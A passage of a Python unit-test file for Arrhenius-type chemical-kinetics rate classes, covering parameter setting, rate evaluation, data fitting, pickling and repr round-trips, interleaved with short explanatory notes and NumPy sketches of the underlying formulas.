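`get_rate_coefficient` in the library performs this same evaluation on the stored SI parameter values.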
    def test_change_t0(self):
        """
        Test the Arrhenius.change_t0() method.
        """
        Tlist = np.array([300, 400, 500, 600, 700, 800, 900, 1000, 1100, 1200, 1300, 1400, 1500])
        k0list = np.array([self.arrhenius.get_rate_coefficient(T) for T in Tlist])
        self.arrhenius.change_t0(300)
        self.assertEqual(self.arrhenius.T0.value_si, 300)
        for T, kexp in zip(Tlist, k0list):
            kact = self.arrhenius.get_rate_coefficient(T)
            self.assertAlmostEqual(kexp, kact, delta=1e-6 * kexp)

    def test_fit_to_data(self):
        """
        Test the Arrhenius.fit_to_data() method.
        """
        Tdata = np.array([300, 400, 500, 600, 700, 800, 900, 1000, 1100, 1200, 1300, 1400, 1500])
        kdata = np.array([self.arrhenius.get_rate_coefficient(T) for T in Tdata])
        arrhenius = Arrhenius().fit_to_data(Tdata, kdata, kunits="m^3/(mol*s)")
        self.assertEqual(float(self.arrhenius.T0.value_si), 1)
        for T, k in zip(Tdata, kdata):
            self.assertAlmostEqual(k, arrhenius.get_rate_coefficient(T), delta=1e-6 * k)
        self.assertAlmostEqual(arrhenius.A.value_si, self.arrhenius.A.value_si, delta=1e0)
        self.assertAlmostEqual(arrhenius.n.value_si, self.arrhenius.n.value_si, places=1)
        self.assertAlmostEqual(arrhenius.Ea.value_si, self.arrhenius.Ea.value_si, 2)
        self.assertAlmostEqual(arrhenius.T0.value_si, self.arrhenius.T0.value_si, 4)
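`fit_to_data` amounts to a linear least-squares fit in log space, since ln k = ln A + n ln(T/T0) - Ea/(R T) is linear in (ln A, n, Ea). A minimal NumPy sketch of that fit (an assumption about the approach; the real method also estimates parameter uncertainties):

```python
import numpy as np

R = 8.314462618  # gas constant, J/(mol*K)

def fit_arrhenius(Tdata, kdata, T0=1.0):
    """Least-squares fit of ln k = ln A + n*ln(T/T0) - Ea/(R*T).

    Returns (A, n, Ea) in SI units; a sketch of what Arrhenius.fit_to_data
    does, without the covariance/uncertainty handling of the real method.
    """
    X = np.column_stack([
        np.ones_like(Tdata),   # coefficient of ln A
        np.log(Tdata / T0),    # coefficient of n
        -1.0 / (R * Tdata),    # coefficient of Ea
    ])
    coeffs, *_ = np.linalg.lstsq(X, np.log(kdata), rcond=None)
    return np.exp(coeffs[0]), coeffs[1], coeffs[2]

# Synthetic data from known parameters; the fit recovers them.
Tdata = np.linspace(300.0, 1500.0, 13)
kdata = 1.0e6 * Tdata ** 0.5 * np.exp(-41840.0 / (R * Tdata))
A, n, Ea = fit_arrhenius(Tdata, kdata)
assert abs(n - 0.5) < 1e-6 and abs(Ea - 41840.0) < 1e-2
```

Because the data here are generated from the model itself, the fit is exact to numerical precision, matching the tight tolerances used in the test above.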
    def test_fit_to_negative_data(self):
        """
        Test the Arrhenius.fit_to_data() method on negative rates.
        """
        Tdata = np.array([300, 400, 500, 600, 700, 800, 900, 1000, 1100, 1200, 1300, 1400, 1500])
        kdata = np.array([-1 * self.arrhenius.get_rate_coefficient(T) for T in Tdata])
        arrhenius = Arrhenius().fit_to_data(Tdata, kdata, kunits="m^3/(mol*s)")
        self.assertEqual(float(self.arrhenius.T0.value_si), 1)
        for T, k in zip(Tdata, kdata):
            self.assertAlmostEqual(k, arrhenius.get_rate_coefficient(T), delta=1e-6 * abs(k))
        self.assertAlmostEqual(arrhenius.A.value_si, -1 * self.arrhenius.A.value_si, delta=1e0)
        self.assertAlmostEqual(arrhenius.n.value_si, self.arrhenius.n.value_si, places=1)
        self.assertAlmostEqual(arrhenius.Ea.value_si, self.arrhenius.Ea.value_si, 2)
        self.assertAlmostEqual(arrhenius.T0.value_si, self.arrhenius.T0.value_si, 4)
    def test_pickle(self):
        """
        Test that an Arrhenius object can be pickled and unpickled with no loss
        of information.
        """
        import pickle
        arrhenius = pickle.loads(pickle.dumps(self.arrhenius, -1))
        self.assertAlmostEqual(self.arrhenius.A.value, arrhenius.A.value, delta=1e0)
        self.assertEqual(self.arrhenius.A.units, arrhenius.A.units)
        self.assertAlmostEqual(self.arrhenius.n.value, arrhenius.n.value, 4)
        self.assertAlmostEqual(self.arrhenius.Ea.value, arrhenius.Ea.value, 4)
        self.assertEqual(self.arrhenius.Ea.units, arrhenius.Ea.units)
        self.assertAlmostEqual(self.arrhenius.T0.value, arrhenius.T0.value, 4)
        self.assertEqual(self.arrhenius.T0.units, arrhenius.T0.units)
        self.assertAlmostEqual(self.arrhenius.Tmin.value, arrhenius.Tmin.value, 4)
        self.assertEqual(self.arrhenius.Tmin.units, arrhenius.Tmin.units)
        self.assertAlmostEqual(self.arrhenius.Tmax.value, arrhenius.Tmax.value, 4)
        self.assertEqual(self.arrhenius.Tmax.units, arrhenius.Tmax.units)
        self.assertEqual(self.arrhenius.comment, arrhenius.comment)

    def test_repr(self):
        """
        Test that an Arrhenius object can be reconstructed from its repr()
        output with no loss of information.
        """
        namespace = {}
        exec('arrhenius = {0!r}'.format(self.arrhenius), globals(), namespace)
        self.assertIn('arrhenius', namespace)
        arrhenius = namespace['arrhenius']
        self.assertAlmostEqual(self.arrhenius.A.value, arrhenius.A.value, delta=1e0)
        self.assertEqual(self.arrhenius.A.units, arrhenius.A.units)
        self.assertAlmostEqual(self.arrhenius.n.value, arrhenius.n.value, 4)
        self.assertAlmostEqual(self.arrhenius.Ea.value, arrhenius.Ea.value, 4)
        self.assertEqual(self.arrhenius.Ea.units, arrhenius.Ea.units)
        self.assertAlmostEqual(self.arrhenius.T0.value, arrhenius.T0.value, 4)
        self.assertEqual(self.arrhenius.T0.units, arrhenius.T0.units)
        self.assertAlmostEqual(self.arrhenius.Tmin.value, arrhenius.Tmin.value, 4)
        self.assertEqual(self.arrhenius.Tmin.units, arrhenius.Tmin.units)
        self.assertAlmostEqual(self.arrhenius.Tmax.value, arrhenius.Tmax.value, 4)
        self.assertEqual(self.arrhenius.Tmax.units, arrhenius.Tmax.units)
        self.assertEqual(self.arrhenius.comment, arrhenius.comment)

    def test_change_rate(self):
        """
        Test the Arrhenius.change_rate() method.
        """
        Tlist = np.array([300, 400, 500, 600, 700, 800, 900, 1000, 1100, 1200, 1300, 1400, 1500])
        k0list = np.array([self.arrhenius.get_rate_coefficient(T) for T in Tlist])
        self.arrhenius.change_rate(2)
        for T, kexp in zip(Tlist, k0list):
            kact = self.arrhenius.get_rate_coefficient(T)
            self.assertAlmostEqual(2 * kexp, kact, delta=1e-6 * kexp)
    def test_to_cantera_kinetics(self):
        """
        Test that the Arrhenius cantera object can be set properly within
        a cantera ElementaryReaction object.
        """
        ctArrhenius = self.arrhenius.to_cantera_kinetics()
        self.assertAlmostEqual(ctArrhenius.pre_exponential_factor, 1e9, 6)
        self.assertAlmostEqual(ctArrhenius.temperature_exponent, 0.5)
        self.assertAlmostEqual(ctArrhenius.activation_energy, 41.84e6)
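The expected Cantera values above are pure unit conversions: Cantera expresses rate parameters per kmol (and activation energies in J/kmol), so A = 1e12 cm^3/(mol*s) becomes 1e9 m^3/(kmol*s) and Ea = 41.84 kJ/mol becomes 41.84e6 J/kmol. A quick arithmetic check:

```python
# Unit conversions behind the expected Cantera values in the test above.
A_cm3_mol_s = 1.0e12
Ea_kJ_mol = 41.84

A_m3_kmol_s = A_cm3_mol_s * 1e-6 * 1e3  # cm^3 -> m^3, per mol -> per kmol
Ea_J_kmol = Ea_kJ_mol * 1e3 * 1e3       # kJ -> J, per mol -> per kmol

assert abs(A_m3_kmol_s - 1.0e9) < 1e-3
assert abs(Ea_J_kmol - 41.84e6) < 1e-3
```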
    def test_to_arrhenius_ep(self):
        """
        Tests that the Arrhenius object can be converted to ArrheniusEP.
        """
        arr_rate = self.arrhenius.get_rate_coefficient(500)
        arr_ep = self.arrhenius.to_arrhenius_ep()
        arr_ep_rate = arr_ep.get_rate_coefficient(500, 10)  # the second number should not matter
        self.assertAlmostEqual(arr_rate, arr_ep_rate)

    def test_to_arrhenius_ep_with_alpha_and_hrxn(self):
        """
        Tests that the Arrhenius object can be converted to ArrheniusEP given parameters.
        """
        hrxn = 5
        arr_rate = self.arrhenius.get_rate_coefficient(500)
        arr_ep = self.arrhenius.to_arrhenius_ep(alpha=1, dHrxn=hrxn)
        self.assertAlmostEqual(1., arr_ep.alpha.value_si)
        arr_ep_rate = arr_ep.get_rate_coefficient(500, hrxn)
        self.assertAlmostEqual(arr_rate, arr_ep_rate)

    def test_to_arrhenius_ep_throws_error_with_just_alpha(self):
        with self.assertRaises(Exception):
            self.arrhenius.to_arrhenius_ep(alpha=1)
################################################################################


class TestArrheniusEP(unittest.TestCase):
    """
    Contains unit tests of the :class:`ArrheniusEP` class.
    """

    def setUp(self):
        """
        A function run before each unit test in this class.
        """
        self.A = 1.0e12
        self.n = 0.5
        self.alpha = 0.5
        self.E0 = 41.84
        self.Tmin = 300.
        self.Tmax = 3000.
        self.comment = 'C2H6'
        self.arrhenius = ArrheniusEP(
            A=(self.A, "cm^3/(mol*s)"),
            n=self.n,
            alpha=self.alpha,
            E0=(self.E0, "kJ/mol"),
            Tmin=(self.Tmin, "K"),
            Tmax=(self.Tmax, "K"),
            comment=self.comment,
        )
    def test_a_factor(self):
        """
        Test that the ArrheniusEP A property was properly set.
        """
        self.assertAlmostEqual(self.arrhenius.A.value_si * 1e6, self.A, delta=1e0)

    def test_n(self):
        """
        Test that the ArrheniusEP n property was properly set.
        """
        self.assertAlmostEqual(self.arrhenius.n.value_si, self.n, 6)

    def test_alpha(self):
        """
        Test that the ArrheniusEP alpha property was properly set.
        """
        self.assertAlmostEqual(self.arrhenius.alpha.value_si, self.alpha, 6)

    def test_e0(self):
        """
        Test that the ArrheniusEP E0 property was properly set.
        """
        self.assertAlmostEqual(self.arrhenius.E0.value_si * 0.001, self.E0, 6)

    def test_temperature_min(self):
        """
        Test that the ArrheniusEP Tmin property was properly set.
        """
        self.assertAlmostEqual(self.arrhenius.Tmin.value_si, self.Tmin, 6)

    def test_temperature_max(self):
        """
        Test that the ArrheniusEP Tmax property was properly set.
        """
        self.assertAlmostEqual(self.arrhenius.Tmax.value_si, self.Tmax, 6)

    def test_comment(self):
        """
        Test that the ArrheniusEP comment property was properly set.
        """
        self.assertEqual(self.arrhenius.comment, self.comment)

    def test_is_temperature_valid(self):
        """
        Test the ArrheniusEP.is_temperature_valid() method.
        """
        Tdata = np.array([200, 400, 600, 800, 1000, 1200, 1400, 1600, 1800, 2000])
        # Use the builtin bool: np.bool was deprecated and removed in NumPy >= 1.24.
        validdata = np.array([False, True, True, True, True, True, True, True, True, True], bool)
        for T, valid in zip(Tdata, validdata):
            valid0 = self.arrhenius.is_temperature_valid(T)
            self.assertEqual(valid0, valid)

    def test_get_rate_coefficient(self):
        """
        Test the ArrheniusEP.get_rate_coefficient() method.
        """
        Tlist = np.array([200, 400, 600, 800, 1000, 1200, 1400, 1600, 1800, 2000])
        kexplist = np.array(
            [1.6721e-4, 6.8770e1, 5.5803e3, 5.2448e4, 2.0632e5, 5.2285e5, 1.0281e6, 1.7225e6, 2.5912e6, 3.6123e6])
        for T, kexp in zip(Tlist, kexplist):
            kact = self.arrhenius.get_rate_coefficient(T)
            self.assertAlmostEqual(kexp, kact, delta=1e-4 * kexp)
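ArrheniusEP uses the Evans-Polanyi relation, Ea = E0 + alpha * dHrxn, and then evaluates the ordinary Arrhenius form; with no reaction enthalpy supplied, Ea reduces to E0, which is why the expected rates above match those of the plain Arrhenius fixture. A standalone sketch (fixture values converted to SI; this omits any clipping of negative activation energies an implementation may perform):

```python
import math

R = 8.314462618  # gas constant, J/(mol*K)

def arrhenius_ep_k(T, dHrxn, A=1.0e6, n=0.5, alpha=0.5, E0=41840.0):
    """Evans-Polanyi rate: Ea = E0 + alpha*dHrxn, then k = A*T**n*exp(-Ea/(R*T))."""
    Ea = E0 + alpha * dHrxn
    return A * T ** n * math.exp(-Ea / (R * T))

# With dHrxn = 0 this reduces to the plain Arrhenius value at 1000 K (2.0632e5).
assert abs(arrhenius_ep_k(1000.0, 0.0) - 2.0632e5) < 1e-3 * 2.0632e5
# An endothermic reaction (dHrxn > 0) raises Ea and so lowers the rate.
assert arrhenius_ep_k(1000.0, 10000.0) < arrhenius_ep_k(1000.0, 0.0)
```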
    def test_pickle(self):
        """
        Test that an ArrheniusEP object can be pickled and unpickled with no loss
        of information.
        """
        import pickle
        arrhenius = pickle.loads(pickle.dumps(self.arrhenius, -1))
        self.assertAlmostEqual(self.arrhenius.A.value, arrhenius.A.value, delta=1e0)
        self.assertEqual(self.arrhenius.A.units, arrhenius.A.units)
        self.assertAlmostEqual(self.arrhenius.n.value, arrhenius.n.value, 4)
        self.assertAlmostEqual(self.arrhenius.alpha.value, arrhenius.alpha.value, 4)
        self.assertAlmostEqual(self.arrhenius.E0.value, arrhenius.E0.value, 4)
        self.assertEqual(self.arrhenius.E0.units, arrhenius.E0.units)
        self.assertAlmostEqual(self.arrhenius.Tmin.value, arrhenius.Tmin.value, 4)
        self.assertEqual(self.arrhenius.Tmin.units, arrhenius.Tmin.units)
        self.assertAlmostEqual(self.arrhenius.Tmax.value, arrhenius.Tmax.value, 4)
        self.assertEqual(self.arrhenius.Tmax.units, arrhenius.Tmax.units)
        self.assertEqual(self.arrhenius.comment, arrhenius.comment)

    def test_repr(self):
        """
        Test that an ArrheniusEP object can be reconstructed from its repr()
        output with no loss of information.
        """
        namespace = {}
        exec('arrhenius = {0!r}'.format(self.arrhenius), globals(), namespace)
        self.assertIn('arrhenius', namespace)
        arrhenius = namespace['arrhenius']
        self.assertAlmostEqual(self.arrhenius.A.value, arrhenius.A.value, delta=1e0)
        self.assertEqual(self.arrhenius.A.units, arrhenius.A.units)
        self.assertAlmostEqual(self.arrhenius.n.value, arrhenius.n.value, 4)
        self.assertAlmostEqual(self.arrhenius.alpha.value, arrhenius.alpha.value, 4)
        self.assertAlmostEqual(self.arrhenius.E0.value, arrhenius.E0.value, 4)
        self.assertEqual(self.arrhenius.E0.units, arrhenius.E0.units)
        self.assertAlmostEqual(self.arrhenius.Tmin.value, arrhenius.Tmin.value, 4)
        self.assertEqual(self.arrhenius.Tmin.units, arrhenius.Tmin.units)
        self.assertAlmostEqual(self.arrhenius.Tmax.value, arrhenius.Tmax.value, 4)
        self.assertEqual(self.arrhenius.Tmax.units, arrhenius.Tmax.units)
        self.assertEqual(self.arrhenius.comment, arrhenius.comment)

    def test_change_rate(self):
        """
        Test the ArrheniusEP.change_rate() method.
        """
        Tlist = np.array([300, 400, 500, 600, 700, 800, 900, 1000, 1100, 1200, 1300, 1400, 1500])
        k0list = np.array([self.arrhenius.get_rate_coefficient(T) for T in Tlist])
        self.arrhenius.change_rate(2)
        for T, kexp in zip(Tlist, k0list):
            kact = self.arrhenius.get_rate_coefficient(T)
            self.assertAlmostEqual(2 * kexp, kact, delta=1e-6 * kexp)
################################################################################


class TestPDepArrhenius(unittest.TestCase):
    """
    Contains unit tests of the :class:`PDepArrhenius` class.
    """

    def setUp(self):
        """
        A function run before each unit test in this class.
        """
        self.arrhenius0 = Arrhenius(
            A=(1.0e6, "s^-1"),
            n=1.0,
            Ea=(10.0, "kJ/mol"),
            T0=(300.0, "K"),
            Tmin=(300.0, "K"),
            Tmax=(2000.0, "K"),
            comment="""This data is completely made up""",
        )
        self.arrhenius1 = Arrhenius(
            A=(1.0e12, "s^-1"),
            n=1.0,
            Ea=(20.0, "kJ/mol"),
            T0=(300.0, "K"),
            Tmin=(300.0, "K"),
            Tmax=(2000.0, "K"),
            comment="""This data is completely made up""",
        )
        self.pressures = np.array([0.1, 10.0])
        self.arrhenius = [self.arrhenius0, self.arrhenius1]
        self.Tmin = 300.0
        self.Tmax = 2000.0
        self.Pmin = 0.1
        self.Pmax = 10.0
        self.comment = """This data is completely made up"""
        self.kinetics = PDepArrhenius(
            pressures=(self.pressures, "bar"),
            arrhenius=self.arrhenius,
            Tmin=(self.Tmin, "K"),
            Tmax=(self.Tmax, "K"),
            Pmin=(self.Pmin, "bar"),
            Pmax=(self.Pmax, "bar"),
            comment=self.comment,
        )
    def test_pressures(self):
        """
        Test that the PDepArrhenius pressures property was properly set.
        """
        self.assertEqual(len(self.kinetics.pressures.value_si), 2)
        for i in range(2):
            self.assertAlmostEqual(self.kinetics.pressures.value_si[i] * 1e-5, self.pressures[i], 4)

    def test_arrhenius(self):
        """
        Test that the PDepArrhenius arrhenius property was properly set.
        """
        self.assertEqual(len(self.kinetics.arrhenius), 2)
        for i in range(2):
            self.assertAlmostEqual(self.kinetics.arrhenius[i].A.value, self.arrhenius[i].A.value, delta=1e0)
            self.assertEqual(self.kinetics.arrhenius[i].A.units, self.arrhenius[i].A.units)
            self.assertAlmostEqual(self.kinetics.arrhenius[i].n.value, self.arrhenius[i].n.value, 4)
            self.assertAlmostEqual(self.kinetics.arrhenius[i].Ea.value, self.arrhenius[i].Ea.value, 4)
            self.assertEqual(self.kinetics.arrhenius[i].Ea.units, self.arrhenius[i].Ea.units)
            self.assertAlmostEqual(self.kinetics.arrhenius[i].T0.value, self.arrhenius[i].T0.value, 4)
            self.assertEqual(self.kinetics.arrhenius[i].T0.units, self.arrhenius[i].T0.units)
            self.assertAlmostEqual(self.kinetics.arrhenius[i].Tmin.value, self.arrhenius[i].Tmin.value, 4)
            self.assertEqual(self.kinetics.arrhenius[i].Tmin.units, self.arrhenius[i].Tmin.units)
            self.assertAlmostEqual(self.kinetics.arrhenius[i].Tmax.value, self.arrhenius[i].Tmax.value, 4)
            self.assertEqual(self.kinetics.arrhenius[i].Tmax.units, self.arrhenius[i].Tmax.units)
            self.assertEqual(self.kinetics.arrhenius[i].comment, self.arrhenius[i].comment)

    def test_temperature_min(self):
        """
        Test that the PDepArrhenius Tmin property was properly set.
        """
        self.assertAlmostEqual(self.kinetics.Tmin.value_si, self.Tmin, 6)

    def test_temperature_max(self):
        """
        Test that the PDepArrhenius Tmax property was properly set.
        """
        self.assertAlmostEqual(self.kinetics.Tmax.value_si, self.Tmax, 6)

    def test_pressure_min(self):
        """
        Test that the PDepArrhenius Pmin property was properly set.
        """
        self.assertAlmostEqual(self.kinetics.Pmin.value_si * 1e-5, self.Pmin, 6)

    def test_pressure_max(self):
        """
        Test that the PDepArrhenius Pmax property was properly set.
        """
        self.assertAlmostEqual(self.kinetics.Pmax.value_si * 1e-5, self.Pmax, 6)

    def test_comment(self):
        """
        Test that the PDepArrhenius comment property was properly set.
        """
        self.assertEqual(self.kinetics.comment, self.comment)

    def test_is_pressure_dependent(self):
        """
        Test the PDepArrhenius.is_pressure_dependent() method.
        """
        self.assertTrue(self.kinetics.is_pressure_dependent())

    def test_get_rate_coefficient(self):
        """
        Test the PDepArrhenius.get_rate_coefficient() method.
        """
        P = 1e4
        for T in [300, 400, 500, 600, 700, 800, 900, 1000, 1100, 1200, 1300, 1400, 1500]:
            k0 = self.kinetics.get_rate_coefficient(T, P)
            k1 = self.arrhenius0.get_rate_coefficient(T)
            self.assertAlmostEqual(k0, k1, delta=1e-6 * k1)
        P = 1e6
        for T in [300, 400, 500, 600, 700, 800, 900, 1000, 1100, 1200, 1300, 1400, 1500]:
            k0 = self.kinetics.get_rate_coefficient(T, P)
            k1 = self.arrhenius1.get_rate_coefficient(T)
            self.assertAlmostEqual(k0, k1, delta=1e-6 * k1)
        P = 1e5
        for T in [300, 400, 500, 600, 700, 800, 900, 1000, 1100, 1200, 1300, 1400, 1500]:
            k0 = self.kinetics.get_rate_coefficient(T, P)
            k1 = math.sqrt(self.arrhenius0.get_rate_coefficient(T) * self.arrhenius1.get_rate_coefficient(T))
            self.assertAlmostEqual(k0, k1, delta=1e-6 * k1)
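Between tabulated pressures, PDepArrhenius interpolates log k linearly in log P, which is why the expected value at P = 1e5 Pa (the geometric mean of the 1e4 and 1e6 Pa entries) is sqrt(k0 * k1). A standalone sketch of the interpolation rule:

```python
import math

def pdep_interpolate(P, P1, P2, k1, k2):
    """Linear interpolation of log k in log P between two bracketing pressures."""
    logk = math.log(k1) + (math.log(k2) - math.log(k1)) * \
        (math.log(P) - math.log(P1)) / (math.log(P2) - math.log(P1))
    return math.exp(logk)

# At the geometric mean of the two pressures this reduces to sqrt(k1*k2).
k = pdep_interpolate(1e5, 1e4, 1e6, 2.0, 8.0)
assert abs(k - 4.0) < 1e-9
```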
    def test_fit_to_data(self):
        """
        Test the PDepArrhenius.fit_to_data() method.
        """
        # Use the builtin float: np.float was deprecated and removed in NumPy >= 1.24.
        Tdata = np.array([300, 400, 500, 600, 700, 800, 900, 1000, 1100, 1200, 1300, 1400, 1500], float)
        Pdata = np.array([1e4, 3e4, 1e5, 3e5, 1e6], float)
        kdata = np.zeros([len(Tdata), len(Pdata)], float)
        for t in range(len(Tdata)):
            for p in range(len(Pdata)):
                kdata[t, p] = self.kinetics.get_rate_coefficient(Tdata[t], Pdata[p])
        kinetics = PDepArrhenius().fit_to_data(Tdata, Pdata, kdata, kunits="s^-1")
        for t in range(len(Tdata)):
            for p in range(len(Pdata)):
                self.assertAlmostEqual(kinetics.get_rate_coefficient(Tdata[t], Pdata[p]), kdata[t, p],
                                       delta=1e-6 * kdata[t, p])
    def test_pickle(self):
        """
        Test that a PDepArrhenius object can be successfully pickled and
        unpickled with no loss of information.
        """
        import pickle
        kinetics = pickle.loads(pickle.dumps(self.kinetics, -1))
        Narrh = 2
        self.assertEqual(len(self.kinetics.pressures.value), Narrh)
        self.assertEqual(len(kinetics.pressures.value), Narrh)
        self.assertEqual(len(self.kinetics.arrhenius), Narrh)
        self.assertEqual(len(kinetics.arrhenius), Narrh)
        for i in range(Narrh):
            self.assertAlmostEqual(self.kinetics.pressures.value[i], kinetics.pressures.value[i], 4)
            self.assertAlmostEqual(self.kinetics.arrhenius[i].A.value, kinetics.arrhenius[i].A.value, delta=1e0)
            self.assertEqual(self.kinetics.arrhenius[i].A.units, kinetics.arrhenius[i].A.units)
            self.assertAlmostEqual(self.kinetics.arrhenius[i].n.value, kinetics.arrhenius[i].n.value)
            self.assertAlmostEqual(self.kinetics.arrhenius[i].T0.value, kinetics.arrhenius[i].T0.value, 4)
            self.assertEqual(self.kinetics.arrhenius[i].T0.units, kinetics.arrhenius[i].T0.units)
            self.assertAlmostEqual(self.kinetics.arrhenius[i].Ea.value, kinetics.arrhenius[i].Ea.value, 4)
            self.assertEqual(self.kinetics.arrhenius[i].Ea.units, kinetics.arrhenius[i].Ea.units)
        self.assertAlmostEqual(self.kinetics.Tmin.value, kinetics.Tmin.value, 4)
        self.assertEqual(self.kinetics.Tmin.units, kinetics.Tmin.units)
        self.assertAlmostEqual(self.kinetics.Tmax.value, kinetics.Tmax.value, 4)
        self.assertEqual(self.kinetics.Tmax.units, kinetics.Tmax.units)
        self.assertAlmostEqual(self.kinetics.Pmin.value, kinetics.Pmin.value, 4)
        self.assertEqual(self.kinetics.Pmin.units, kinetics.Pmin.units)
        self.assertAlmostEqual(self.kinetics.Pmax.value, kinetics.Pmax.value, 4)
        self.assertEqual(self.kinetics.Pmax.units, kinetics.Pmax.units)
        self.assertEqual(self.kinetics.comment, kinetics.comment)

    def test_repr(self):
        """
        Test that a PDepArrhenius object can be successfully reconstructed
        from its repr() output with no loss of information.
        """
        namespace = {}
        exec('kinetics = {0!r}'.format(self.kinetics), globals(), namespace)
        self.assertIn('kinetics', namespace)
        kinetics = namespace['kinetics']
        Narrh = 2
        self.assertEqual(len(self.kinetics.pressures.value), Narrh)
        self.assertEqual(len(kinetics.pressures.value), Narrh)
        self.assertEqual(len(self.kinetics.arrhenius), Narrh)
        self.assertEqual(len(kinetics.arrhenius), Narrh)
        for i in range(Narrh):
            self.assertAlmostEqual(self.kinetics.pressures.value[i], kinetics.pressures.value[i], 4)
            self.assertAlmostEqual(self.kinetics.arrhenius[i].A.value, kinetics.arrhenius[i].A.value, delta=1e0)
            self.assertEqual(self.kinetics.arrhenius[i].A.units, kinetics.arrhenius[i].A.units)
            self.assertAlmostEqual(self.kinetics.arrhenius[i].n.value, kinetics.arrhenius[i].n.value)
            self.assertAlmostEqual(self.kinetics.arrhenius[i].T0.value, kinetics.arrhenius[i].T0.value, 4)
            self.assertEqual(self.kinetics.arrhenius[i].T0.units, kinetics.arrhenius[i].T0.units)
            self.assertAlmostEqual(self.kinetics.arrhenius[i].Ea.value, kinetics.arrhenius[i].Ea.value, 4)
            self.assertEqual(self.kinetics.arrhenius[i].Ea.units, kinetics.arrhenius[i].Ea.units)
        self.assertAlmostEqual(self.kinetics.Tmin.value, kinetics.Tmin.value, 4)
        self.assertEqual(self.kinetics.Tmin.units, kinetics.Tmin.units)
        self.assertAlmostEqual(self.kinetics.Tmax.value, kinetics.Tmax.value, 4)
        self.assertEqual(self.kinetics.Tmax.units, kinetics.Tmax.units)
        self.assertAlmostEqual(self.kinetics.Pmin.value, kinetics.Pmin.value, 4)
        self.assertEqual(self.kinetics.Pmin.units, kinetics.Pmin.units)
        self.assertAlmostEqual(self.kinetics.Pmax.value, kinetics.Pmax.value, 4)
        self.assertEqual(self.kinetics.Pmax.units, kinetics.Pmax.units)
        self.assertEqual(self.kinetics.comment, kinetics.comment)

    def test_change_rate(self):
        """
        Test the PDepArrhenius.change_rate() method.
        """
        Tlist = np.array([300, 400, 500, 600, 700, 800, 900, 1000, 1100, 1200, 1300, 1400, 1500])
        k0list = np.array([self.kinetics.get_rate_coefficient(T, 1e5) for T in Tlist])
        self.kinetics.change_rate(2)
        for T, kexp in zip(Tlist, k0list):
            kact = self.kinetics.get_rate_coefficient(T, 1e5)
            self.assertAlmostEqual(2 * kexp, kact, delta=1e-6 * kexp)
################################################################################


class TestMultiArrhenius(unittest.TestCase):
    """
    Contains unit tests of the :class:`MultiArrhenius` class.
    """

    def setUp(self):
        """
        A function run before each unit test in this class.
        """
        self.Tmin = 350.
        self.Tmax = 1500.
        self.comment = 'Comment'
        self.arrhenius = [
            Arrhenius(
                A=(9.3e-14, "cm^3/(molecule*s)"),
                n=0.0,
                Ea=(4740 * constants.R * 0.001, "kJ/mol"),
                T0=(1, "K"),
                Tmin=(self.Tmin, "K"),
                Tmax=(self.Tmax, "K"),
                comment=self.comment,
            ),
            Arrhenius(
                A=(1.4e-9, "cm^3/(molecule*s)"),
                n=0.0,
                Ea=(11200 * constants.R * 0.001, "kJ/mol"),
                T0=(1, "K"),
                Tmin=(self.Tmin, "K"),
                Tmax=(self.Tmax, "K"),
                comment=self.comment,
            ),
        ]
        self.kinetics = MultiArrhenius(
            arrhenius=self.arrhenius,
            Tmin=(self.Tmin, "K"),
            Tmax=(self.Tmax, "K"),
            comment=self.comment,
        )
        self.single_kinetics = MultiArrhenius(
            arrhenius=self.arrhenius[:1],
            Tmin=(self.Tmin, "K"),
            Tmax=(self.Tmax, "K"),
            comment=self.comment,
        )
    def test_arrhenius(self):
        """
        Test that the MultiArrhenius arrhenius property was properly set.
        """
        self.assertEqual(self.kinetics.arrhenius, self.arrhenius)

    def test_temperature_min(self):
        """
        Test that the MultiArrhenius Tmin property was properly set.
        """
        self.assertAlmostEqual(self.kinetics.Tmin.value_si, self.Tmin, 6)

    def test_temperature_max(self):
        """
        Test that the MultiArrhenius Tmax property was properly set.
        """
        self.assertAlmostEqual(self.kinetics.Tmax.value_si, self.Tmax, 6)

    def test_comment(self):
        """
        Test that the MultiArrhenius comment property was properly set.
        """
        self.assertEqual(self.kinetics.comment, self.comment)

    def test_is_temperature_valid(self):
        """
        Test the MultiArrhenius.is_temperature_valid() method.
        """
        Tdata = np.array([200, 400, 600, 800, 1000, 1200, 1400, 1600, 1800, 2000])
        # Use the builtin bool: np.bool was deprecated and removed in NumPy >= 1.24.
        validdata = np.array([False, True, True, True, True, True, True, False, False, False], bool)
        for T, valid in zip(Tdata, validdata):
            valid0 = self.kinetics.is_temperature_valid(T)
            self.assertEqual(valid0, valid)

    def test_get_rate_coefficient(self):
        """
        Test the MultiArrhenius.get_rate_coefficient() method.
        """
        Tlist = np.array([200, 400, 600, 800, 1000, 1200, 1400, 1600, 1800, 2000])
        kexplist = np.array(
            [2.85400e-06, 4.00384e-01, 2.73563e+01, 8.50699e+02, 1.20181e+04, 7.56312e+04, 2.84724e+05, 7.71702e+05,
             1.67743e+06, 3.12290e+06])
        for T, kexp in zip(Tlist, kexplist):
            kact = self.kinetics.get_rate_coefficient(T)
            self.assertAlmostEqual(kexp, kact, delta=1e-4 * kexp)
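A MultiArrhenius rate is simply the sum of its component Arrhenius channel rates, which is what produces the expected values above from the two fixtures in `setUp`. A standalone sketch with made-up channel parameters (not the fixture's values):

```python
import math

R = 8.314462618  # gas constant, J/(mol*K)

def arrhenius_k(T, A, n, Ea, T0=1.0):
    """Single modified-Arrhenius channel k(T) = A*(T/T0)**n*exp(-Ea/(R*T))."""
    return A * (T / T0) ** n * math.exp(-Ea / (R * T))

def multi_arrhenius_k(T, params):
    """MultiArrhenius total rate: the sum over the individual channels."""
    return sum(arrhenius_k(T, *p) for p in params)

# Two illustrative channels (A, n, Ea) in SI units.
params = [(1.0e6, 0.0, 40000.0), (2.0e4, 0.0, 10000.0)]
k_total = multi_arrhenius_k(500.0, params)
```

Because the channels simply add, the total always exceeds any single channel's rate at the same temperature.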
    def test_pickle(self):
        """
        Test that a MultiArrhenius object can be pickled and unpickled with no loss
        of information.
        """
        import pickle
        kinetics = pickle.loads(pickle.dumps(self.kinetics, -1))
        self.assertEqual(len(self.kinetics.arrhenius), len(kinetics.arrhenius))
        for arrh0, arrh in zip(self.kinetics.arrhenius, kinetics.arrhenius):
            self.assertAlmostEqual(arrh0.A.value, arrh.A.value, delta=1e-18)
            self.assertEqual(arrh0.A.units, arrh.A.units)
            self.assertAlmostEqual(arrh0.n.value, arrh.n.value, 4)
            self.assertAlmostEqual(arrh0.Ea.value, arrh.Ea.value, 4)
            self.assertEqual(arrh0.Ea.units, arrh.Ea.units)
